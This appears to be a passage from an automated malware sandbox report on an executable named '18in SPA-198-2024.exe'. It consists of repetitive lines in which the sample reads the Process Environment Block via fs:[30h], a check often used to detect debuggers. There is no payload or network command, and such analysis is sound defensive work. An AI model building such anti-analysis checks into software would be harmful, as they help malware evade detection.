Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0121A3C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0121A3C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012183C0 mov eax, dword ptr fs:[00000030h]	4_2_012183C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012183C0 mov eax, dword ptr fs:[00000030h]	4_2_012183C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012183C0 mov eax, dword ptr fs:[00000030h]	4_2_012183C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012183C0 mov eax, dword ptr fs:[00000030h]	4_2_012183C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012963C0 mov eax, dword ptr fs:[00000030h]	4_2_012963C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE3DB mov eax, dword ptr fs:[00000030h]	4_2_012BE3DB
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE3DB mov eax, dword ptr fs:[00000030h]	4_2_012BE3DB
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE3DB mov ecx, dword ptr fs:[00000030h]	4_2_012BE3DB
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE3DB mov eax, dword ptr fs:[00000030h]	4_2_012BE3DB
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B43D4 mov eax, dword ptr fs:[00000030h]	4_2_012B43D4
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B43D4 mov eax, dword ptr fs:[00000030h]	4_2_012B43D4
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120823B mov eax, dword ptr fs:[00000030h]	4_2_0120823B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01214260 mov eax, dword ptr fs:[00000030h]	4_2_01214260
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01214260 mov eax, dword ptr fs:[00000030h]	4_2_01214260
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01214260 mov eax, dword ptr fs:[00000030h]	4_2_01214260
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120826B mov eax, dword ptr fs:[00000030h]	4_2_0120826B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274 mov eax, dword ptr fs:[00000030h]	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274 mov eax, dword ptr fs:[00000030h]	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274 mov eax, dword ptr fs:[00000030h]	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274 mov eax, dword ptr fs:[00000030h]	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274 mov eax, dword ptr fs:[00000030h]	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274 mov eax, dword ptr fs:[00000030h]	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274 mov eax, dword ptr fs:[00000030h]	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274 mov eax, dword ptr fs:[00000030h]	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274 mov eax, dword ptr fs:[00000030h]	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274 mov eax, dword ptr fs:[00000030h]	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274 mov eax, dword ptr fs:[00000030h]	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274 mov eax, dword ptr fs:[00000030h]	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01298243 mov eax, dword ptr fs:[00000030h]	4_2_01298243
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01298243 mov ecx, dword ptr fs:[00000030h]	4_2_01298243
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120A250 mov eax, dword ptr fs:[00000030h]	4_2_0120A250
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01216259 mov eax, dword ptr fs:[00000030h]	4_2_01216259
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012CA250 mov eax, dword ptr fs:[00000030h]	4_2_012CA250
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012CA250 mov eax, dword ptr fs:[00000030h]	4_2_012CA250
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012202A0 mov eax, dword ptr fs:[00000030h]	4_2_012202A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012202A0 mov eax, dword ptr fs:[00000030h]	4_2_012202A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A62A0 mov eax, dword ptr fs:[00000030h]	4_2_012A62A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A62A0 mov ecx, dword ptr fs:[00000030h]	4_2_012A62A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A62A0 mov eax, dword ptr fs:[00000030h]	4_2_012A62A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A62A0 mov eax, dword ptr fs:[00000030h]	4_2_012A62A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A62A0 mov eax, dword ptr fs:[00000030h]	4_2_012A62A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A62A0 mov eax, dword ptr fs:[00000030h]	4_2_012A62A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E284 mov eax, dword ptr fs:[00000030h]	4_2_0124E284
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E284 mov eax, dword ptr fs:[00000030h]	4_2_0124E284
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01290283 mov eax, dword ptr fs:[00000030h]	4_2_01290283
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01290283 mov eax, dword ptr fs:[00000030h]	4_2_01290283
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01290283 mov eax, dword ptr fs:[00000030h]	4_2_01290283
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012202E1 mov eax, dword ptr fs:[00000030h]	4_2_012202E1
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012202E1 mov eax, dword ptr fs:[00000030h]	4_2_012202E1
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012202E1 mov eax, dword ptr fs:[00000030h]	4_2_012202E1
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0121A2C3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0121A2C3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0121A2C3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0121A2C3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0121A2C3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220535 mov eax, dword ptr fs:[00000030h]	4_2_01220535
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220535 mov eax, dword ptr fs:[00000030h]	4_2_01220535
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220535 mov eax, dword ptr fs:[00000030h]	4_2_01220535
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220535 mov eax, dword ptr fs:[00000030h]	4_2_01220535
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220535 mov eax, dword ptr fs:[00000030h]	4_2_01220535
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220535 mov eax, dword ptr fs:[00000030h]	4_2_01220535
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E53E mov eax, dword ptr fs:[00000030h]	4_2_0123E53E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E53E mov eax, dword ptr fs:[00000030h]	4_2_0123E53E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E53E mov eax, dword ptr fs:[00000030h]	4_2_0123E53E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E53E mov eax, dword ptr fs:[00000030h]	4_2_0123E53E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E53E mov eax, dword ptr fs:[00000030h]	4_2_0123E53E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A6500 mov eax, dword ptr fs:[00000030h]	4_2_012A6500
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E4500 mov eax, dword ptr fs:[00000030h]	4_2_012E4500
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E4500 mov eax, dword ptr fs:[00000030h]	4_2_012E4500
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E4500 mov eax, dword ptr fs:[00000030h]	4_2_012E4500
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E4500 mov eax, dword ptr fs:[00000030h]	4_2_012E4500
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E4500 mov eax, dword ptr fs:[00000030h]	4_2_012E4500
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E4500 mov eax, dword ptr fs:[00000030h]	4_2_012E4500
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E4500 mov eax, dword ptr fs:[00000030h]	4_2_012E4500
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124656A mov eax, dword ptr fs:[00000030h]	4_2_0124656A
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124656A mov eax, dword ptr fs:[00000030h]	4_2_0124656A
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124656A mov eax, dword ptr fs:[00000030h]	4_2_0124656A
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01218550 mov eax, dword ptr fs:[00000030h]	4_2_01218550
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01218550 mov eax, dword ptr fs:[00000030h]	4_2_01218550
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012905A7 mov eax, dword ptr fs:[00000030h]	4_2_012905A7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012905A7 mov eax, dword ptr fs:[00000030h]	4_2_012905A7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012905A7 mov eax, dword ptr fs:[00000030h]	4_2_012905A7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012345B1 mov eax, dword ptr fs:[00000030h]	4_2_012345B1
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012345B1 mov eax, dword ptr fs:[00000030h]	4_2_012345B1
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01212582 mov eax, dword ptr fs:[00000030h]	4_2_01212582
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01212582 mov ecx, dword ptr fs:[00000030h]	4_2_01212582
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01244588 mov eax, dword ptr fs:[00000030h]	4_2_01244588
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E59C mov eax, dword ptr fs:[00000030h]	4_2_0124E59C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012125E0 mov eax, dword ptr fs:[00000030h]	4_2_012125E0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0123E5E7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0123E5E7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0123E5E7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0123E5E7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0123E5E7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0123E5E7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0123E5E7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0123E5E7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124C5ED mov eax, dword ptr fs:[00000030h]	4_2_0124C5ED
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124C5ED mov eax, dword ptr fs:[00000030h]	4_2_0124C5ED
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E5CF mov eax, dword ptr fs:[00000030h]	4_2_0124E5CF
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E5CF mov eax, dword ptr fs:[00000030h]	4_2_0124E5CF
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012165D0 mov eax, dword ptr fs:[00000030h]	4_2_012165D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124A5D0 mov eax, dword ptr fs:[00000030h]	4_2_0124A5D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124A5D0 mov eax, dword ptr fs:[00000030h]	4_2_0124A5D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120E420 mov eax, dword ptr fs:[00000030h]	4_2_0120E420
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120E420 mov eax, dword ptr fs:[00000030h]	4_2_0120E420
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120E420 mov eax, dword ptr fs:[00000030h]	4_2_0120E420
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120C427 mov eax, dword ptr fs:[00000030h]	4_2_0120C427
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01296420 mov eax, dword ptr fs:[00000030h]	4_2_01296420
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01296420 mov eax, dword ptr fs:[00000030h]	4_2_01296420
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01296420 mov eax, dword ptr fs:[00000030h]	4_2_01296420
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01296420 mov eax, dword ptr fs:[00000030h]	4_2_01296420
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01296420 mov eax, dword ptr fs:[00000030h]	4_2_01296420
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01296420 mov eax, dword ptr fs:[00000030h]	4_2_01296420
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01296420 mov eax, dword ptr fs:[00000030h]	4_2_01296420
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124A430 mov eax, dword ptr fs:[00000030h]	4_2_0124A430
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01248402 mov eax, dword ptr fs:[00000030h]	4_2_01248402
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01248402 mov eax, dword ptr fs:[00000030h]	4_2_01248402
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01248402 mov eax, dword ptr fs:[00000030h]	4_2_01248402
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129C460 mov ecx, dword ptr fs:[00000030h]	4_2_0129C460
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123A470 mov eax, dword ptr fs:[00000030h]	4_2_0123A470
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123A470 mov eax, dword ptr fs:[00000030h]	4_2_0123A470
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123A470 mov eax, dword ptr fs:[00000030h]	4_2_0123A470
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E443 mov eax, dword ptr fs:[00000030h]	4_2_0124E443
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E443 mov eax, dword ptr fs:[00000030h]	4_2_0124E443
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E443 mov eax, dword ptr fs:[00000030h]	4_2_0124E443
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E443 mov eax, dword ptr fs:[00000030h]	4_2_0124E443
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E443 mov eax, dword ptr fs:[00000030h]	4_2_0124E443
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E443 mov eax, dword ptr fs:[00000030h]	4_2_0124E443
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E443 mov eax, dword ptr fs:[00000030h]	4_2_0124E443
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E443 mov eax, dword ptr fs:[00000030h]	4_2_0124E443
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123245A mov eax, dword ptr fs:[00000030h]	4_2_0123245A
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012CA456 mov eax, dword ptr fs:[00000030h]	4_2_012CA456
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120645D mov eax, dword ptr fs:[00000030h]	4_2_0120645D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012164AB mov eax, dword ptr fs:[00000030h]	4_2_012164AB
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012444B0 mov ecx, dword ptr fs:[00000030h]	4_2_012444B0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129A4B0 mov eax, dword ptr fs:[00000030h]	4_2_0129A4B0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012CA49A mov eax, dword ptr fs:[00000030h]	4_2_012CA49A
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012104E5 mov ecx, dword ptr fs:[00000030h]	4_2_012104E5
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124C720 mov eax, dword ptr fs:[00000030h]	4_2_0124C720
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124C720 mov eax, dword ptr fs:[00000030h]	4_2_0124C720
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124273C mov eax, dword ptr fs:[00000030h]	4_2_0124273C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124273C mov ecx, dword ptr fs:[00000030h]	4_2_0124273C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124273C mov eax, dword ptr fs:[00000030h]	4_2_0124273C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128C730 mov eax, dword ptr fs:[00000030h]	4_2_0128C730
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124C700 mov eax, dword ptr fs:[00000030h]	4_2_0124C700
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01210710 mov eax, dword ptr fs:[00000030h]	4_2_01210710
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01240710 mov eax, dword ptr fs:[00000030h]	4_2_01240710
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01218770 mov eax, dword ptr fs:[00000030h]	4_2_01218770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770 mov eax, dword ptr fs:[00000030h]	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770 mov eax, dword ptr fs:[00000030h]	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770 mov eax, dword ptr fs:[00000030h]	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770 mov eax, dword ptr fs:[00000030h]	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770 mov eax, dword ptr fs:[00000030h]	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770 mov eax, dword ptr fs:[00000030h]	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770 mov eax, dword ptr fs:[00000030h]	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770 mov eax, dword ptr fs:[00000030h]	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770 mov eax, dword ptr fs:[00000030h]	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770 mov eax, dword ptr fs:[00000030h]	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770 mov eax, dword ptr fs:[00000030h]	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770 mov eax, dword ptr fs:[00000030h]	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124674D mov esi, dword ptr fs:[00000030h]	4_2_0124674D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124674D mov eax, dword ptr fs:[00000030h]	4_2_0124674D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124674D mov eax, dword ptr fs:[00000030h]	4_2_0124674D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01210750 mov eax, dword ptr fs:[00000030h]	4_2_01210750
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129E75D mov eax, dword ptr fs:[00000030h]	4_2_0129E75D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252750 mov eax, dword ptr fs:[00000030h]	4_2_01252750
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252750 mov eax, dword ptr fs:[00000030h]	4_2_01252750
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01294755 mov eax, dword ptr fs:[00000030h]	4_2_01294755
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C47A0 mov eax, dword ptr fs:[00000030h]	4_2_012C47A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012107AF mov eax, dword ptr fs:[00000030h]	4_2_012107AF
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B678E mov eax, dword ptr fs:[00000030h]	4_2_012B678E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129E7E1 mov eax, dword ptr fs:[00000030h]	4_2_0129E7E1
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012327ED mov eax, dword ptr fs:[00000030h]	4_2_012327ED
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012327ED mov eax, dword ptr fs:[00000030h]	4_2_012327ED
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012327ED mov eax, dword ptr fs:[00000030h]	4_2_012327ED
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012147FB mov eax, dword ptr fs:[00000030h]	4_2_012147FB
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012147FB mov eax, dword ptr fs:[00000030h]	4_2_012147FB
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121C7C0 mov eax, dword ptr fs:[00000030h]	4_2_0121C7C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012907C3 mov eax, dword ptr fs:[00000030h]	4_2_012907C3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01246620 mov eax, dword ptr fs:[00000030h]	4_2_01246620
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01248620 mov eax, dword ptr fs:[00000030h]	4_2_01248620
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122E627 mov eax, dword ptr fs:[00000030h]	4_2_0122E627
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121262C mov eax, dword ptr fs:[00000030h]	4_2_0121262C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128E609 mov eax, dword ptr fs:[00000030h]	4_2_0128E609
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122260B mov eax, dword ptr fs:[00000030h]	4_2_0122260B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122260B mov eax, dword ptr fs:[00000030h]	4_2_0122260B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122260B mov eax, dword ptr fs:[00000030h]	4_2_0122260B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122260B mov eax, dword ptr fs:[00000030h]	4_2_0122260B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122260B mov eax, dword ptr fs:[00000030h]	4_2_0122260B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122260B mov eax, dword ptr fs:[00000030h]	4_2_0122260B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122260B mov eax, dword ptr fs:[00000030h]	4_2_0122260B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252619 mov eax, dword ptr fs:[00000030h]	4_2_01252619
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D866E mov eax, dword ptr fs:[00000030h]	4_2_012D866E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D866E mov eax, dword ptr fs:[00000030h]	4_2_012D866E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124A660 mov eax, dword ptr fs:[00000030h]	4_2_0124A660
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124A660 mov eax, dword ptr fs:[00000030h]	4_2_0124A660
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01242674 mov eax, dword ptr fs:[00000030h]	4_2_01242674
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122C640 mov eax, dword ptr fs:[00000030h]	4_2_0122C640
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124C6A6 mov eax, dword ptr fs:[00000030h]	4_2_0124C6A6
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012466B0 mov eax, dword ptr fs:[00000030h]	4_2_012466B0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01214690 mov eax, dword ptr fs:[00000030h]	4_2_01214690
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01214690 mov eax, dword ptr fs:[00000030h]	4_2_01214690
